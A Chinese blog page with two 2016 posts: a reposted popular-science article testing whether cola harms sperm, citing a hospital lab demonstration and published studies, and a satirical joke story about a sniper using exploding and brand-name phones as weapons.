可乐杀精这个传说已经很久了,到底是真是假?据说老外做过一个实验,是把精虫直接泡在可乐里,见过大风大浪的小蝌蚪竟然没抗住,直接被可乐给灭了。试试看呗实验地点杭州市红会医院 生殖医学科实验室实验材料可乐 咖啡 白酒 清水 生理盐水 精液实验设备精子质量分析仪实验专家红会医院生殖实验室 颜医生先看看正常的精子是啥样,还真的很像一颗颗小蝌蚪,奋力地游动。但是马上,它们就将面临未知的命运。现在,精液已经分别和可乐、咖啡、白酒、清水、生理盐水混合均匀。这时候的精子,会发生什么样的改变呢。虽然咖啡中的颗粒比较多,对精子运动形成了阻力,但仍然可以很清楚地看到,运动着的这几颗精子,活力还是不错的。酒精的杀伤力果然厉害,只短短两分钟,所有的精子都一动不动,全军覆没了。万万没想到,清水也能杀精?混合了清水的精子,大部分都没了动静,只有一两颗还在顽强地游动。颜医生说,清水改变了精子的生理环境,造成细胞膜的清水跨膜运动,导致精子膨胀了。5种液体中混合了生理盐水的精子存活率是最高的而且活着的这部分精子 活力依然强劲最后,混合了可乐的精子,到底会有什么样的变化呢?加了可乐后的精子,虽然也有明显的变化,但不论是存活率还是活力,都比白酒和清水强一些。颜医生说,跟咖啡一样,可乐里面含有咖啡因,咖啡因在精子线粒体的能量转化中是有所帮助的。从这个实验看,直接跟精子接触,可乐的杀伤力甚至还不如纯净水。五种液体对精子的直接杀伤力排名依次是酒精>清水>咖啡>可乐>生理盐水但是仔细想想,这个实验其实并不靠谱啊,毕竟喝进去的可乐,不可能直接接触人的精子,可乐喝入人体后是否对精子有影响?做过类似实验的研究者极少。《好奇实验室》几经周折,终于在2008年《中国公共卫生》上找到一篇有参考价值的学术论文,题目是《可乐对小鼠精子质量影响》。这个实验是当年兰州大学公共卫生学院的几位同学做的,刘舒瑜是其中一位,目前他在兰州市疾控中心做公共卫生医师。刘舒瑜说,他们的实验,每天向小白鼠灌0.6毫升可乐,一天一次。对人来说,折合下来,这个量相当于300毫升。实验结果是畸形率比较高,头部畸形比较多。刘舒瑜他们的实验,说明可乐具有一定的杀精作用。但是,也有结论不同的研究。2001年到2006年期间,丹麦医生詹森曾对2554名年轻男子的精子质量和咖啡因摄入情况进行了调查,结果发现,如果你不是每天至少喝两瓶可乐,7杯咖啡,就不用担心精子的质量。虽然有3%喝巨量可乐的调查对象精子数量下降,但詹森说,这些人还有其他很多不良饮食习惯。而且,即便他们的精子总数下降了30%,依然处于世界卫生组织所给出的正常精子总数范围。虽然目前还没有权威的研究证明大量饮用可乐会引起精子质量下降但另一些影响精子质量的因素却是实实在在存在的从近20年统计资料来看浙江省男性精子密度的范围已经从6000万下降到了1500万环境因素,生活质量,精神紧张,压力大,性生活太多,得前列腺炎的人群也不断扩大,总之就是很多原因造成精子质量下降,这个锅,全部丢给可乐是很不公平的!转自:http://www.nameluo.com/post/135.html
2016年10月16日
103 阅读
8 评论
0 点赞
2016-10-10
三星高科技核弹-改变战场!
我是支援中东的中国特种兵,是个狙击手,今天执行任务的时候蹲到了老美的狙击手,他就在另一个掩体后面,也发现了我。 我们两个都躲在各自的掩体内,不敢露面。时间一分一秒的过去,我们两个却静静的对峙,谁都没敢动。 就在这时,我听到了对面掩体后发出了窸窸窣窣的声音,我知道那个老美待不住了,他想跑,我架好枪,只等他出来送他归西。 他的确出来了,我瞄准头部一枪开了过去。可是刚刚开枪我就后悔了。 因为,他在头盔上绑了一个华为,被我不偏不倚的打中了。 对方也有所准备,在我开枪的一瞬间,也对着我开了一枪,我急忙缩到掩体后,躲过了一劫。 老美的确狡猾,居然懂得用华为挡子弹。 我犹豫着,从口袋中掏出战友送我,一直未开机的三星note7。 我点燃一支香烟,考虑了好久,才按下开机键。 三星note7并没有爆炸,这让我长舒了一口气。 我计算了一下我和老美之间的距离,算准了抛物线,然后默默地掏出了我的小米。 中东有时夜晚寒冷,我经常靠它取暖,现在,除了取暖,它还可以帮我一个天大的忙。 我翻着小米的电话簿,终于找到了一个号码,备注是三星note7。 我又翻了翻背包,从中掏出一个苹果7,这是我在战场缴获的,现在,也能派上用场。 现在,机会只有一次。这次,不容有失。 刚刚对战之后,老美的狙击手显然处于上风,一直在悄悄地瞄准着我,我并不敢露头。 把手中烟头摁灭,我心一横,成败,在此一举。 躲在掩体后,我将苹果7猛的向上一抛,紧接着在极短的时间内,我将三星note7抛掷到老美藏身之处,另一只手抓起我的小米,拨通了电话。 “轰”一声巨响,我明显感觉到我的掩体颤了颤。 我默默地掏出了仅剩的最后一根香烟,点燃,深吸。 最终,我赢了。只因那老美贪心的用瞄准镜看了一眼苹果7,而没有狙掉足以让他失去生命的三星note7。 明天,我的敌人是谁,我是否能继续活着,还是未知。 香烟燃尽,我拿起了仅剩的小米,发了这条评论。 默默地做了许久,我下定决心回去要向指挥官申请一台诺基亚,我还缺个趁手的近战武器。 夕阳下的余晖,我扛着枪,准备回去报道。 有的时候,改变战场的,真的是高科技。
2016年10月10日
112 阅读
0 评论
0 点赞
1
...
3
4
5
...
28